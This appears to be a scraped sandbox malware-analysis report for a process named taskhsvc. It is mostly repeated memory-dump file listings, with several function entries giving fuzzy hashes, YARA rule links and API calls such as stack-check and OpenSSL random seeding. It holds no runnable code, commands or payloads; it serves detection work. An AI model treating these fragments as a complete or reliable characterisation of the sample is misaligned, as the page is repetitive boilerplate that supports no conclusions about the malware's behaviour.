Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: b2650022ba9a00897f25429e087dd0095bad598a8dbeee799114095699b3bac8
Instruction ID: 14f2184c80fbcd0ef36af11a0436e563c40c4cd05681b6660d50e733a0941717
Opcode Fuzzy Hash: b2650022ba9a00897f25429e087dd0095bad598a8dbeee799114095699b3bac8
Instruction Fuzzy Hash: 55F09DB4A043099FCB40DFA9C585A8EBBF0FB48344F148919E858E7305E379A9058F91

Uniqueness

Uniqueness Score: -1.00%

Function 00E019D3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00E7C702), ref: 00E01A21

Part of subcall function 00EE8B88: abort.MSVCRT ref: 00EE8BEE
Part of subcall function 00EE8B88: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E019FB), ref: 00EE8C4C

Memory Dump Source

Source File: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort
String ID:
API String ID: 646538096-0
Opcode ID: d5e8c4af836c57ff2633cfaa37ee5d3d05d6997454ae678d9ce8ad104cb182e5
Instruction ID: 6e11991eb8426b6725b88df546c4af627461948cc3ae3fb111e541c6699eb26b
Opcode Fuzzy Hash: d5e8c4af836c57ff2633cfaa37ee5d3d05d6997454ae678d9ce8ad104cb182e5
Instruction Fuzzy Hash: AFF0D474F0420A8FCB40DFA9C985BAEB7F0EF08314F0485A5E818EB355D774A9429F91

Uniqueness

Uniqueness Score: -1.00%

Function 00E8F9A6 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00E8F9F0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00E8F9BB), ref: 00E8FA9D

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00E918A7), ref: 00E8F9E9

Part of subcall function 00E90435: free.MSVCRT ref: 00E9059D

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID:
API String ID: 2817809126-0
Opcode ID: c1ff340ca3da224d7c96ad68c719ce3e5fcc8e8255eb5440faa2678c01208ea7
Instruction ID: 678a628599b8f4ec4544560416376076c9e8c54ef049df6b71d66b954d90de6b
Opcode Fuzzy Hash: c1ff340ca3da224d7c96ad68c719ce3e5fcc8e8255eb5440faa2678c01208ea7
Instruction Fuzzy Hash: 8AF0C074A006169FCF00FFBAC985A6E77F4BF44304B455964E854E7355D734E8058B50

Uniqueness

Uniqueness Score: -1.00%

Function 00D94C42 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00F0CC1C: RAND_poll.LIBEAY32 ref: 00F0CC3A
Part of subcall function 00F0CC1C: RAND_seed.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00F05F8E), ref: 00F0CC9E
Part of subcall function 00F0CC1C: RAND_status.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00F05F8E), ref: 00F0CCCA
Part of subcall function 00F0CC1C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00F05F8E), ref: 00F0CCEB

__stack_chk_fail.LIBSSP-0 ref: 00D94C9B

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$D_pollD_seedD_status
String ID:
API String ID: 233213208-0
Opcode ID: 7e7fa6d843323b3adff9b38f8806a9108d814c308aae33cdf14696352038edd0
Instruction ID: d0bd49765dd399d9f0103e408c88b5d2ef23b9328a629b32cd8596f8b5d0761f
Opcode Fuzzy Hash: 7e7fa6d843323b3adff9b38f8806a9108d814c308aae33cdf14696352038edd0
Instruction Fuzzy Hash: ABF0F870A042099FDF00EF6AC94565EBBF1EB44354F04C819E898DB346D378E546DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00EB38C7 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00F00A40: __stack_chk_fail.LIBSSP-0 ref: 00F00A60

__stack_chk_fail.LIBSSP-0 ref: 00EB3900

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00E9F6A9: free.MSVCRT ref: 00E9F754
Part of subcall function 00E9F6A9: __stack_chk_fail.LIBSSP-0 ref: 00E9F869

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
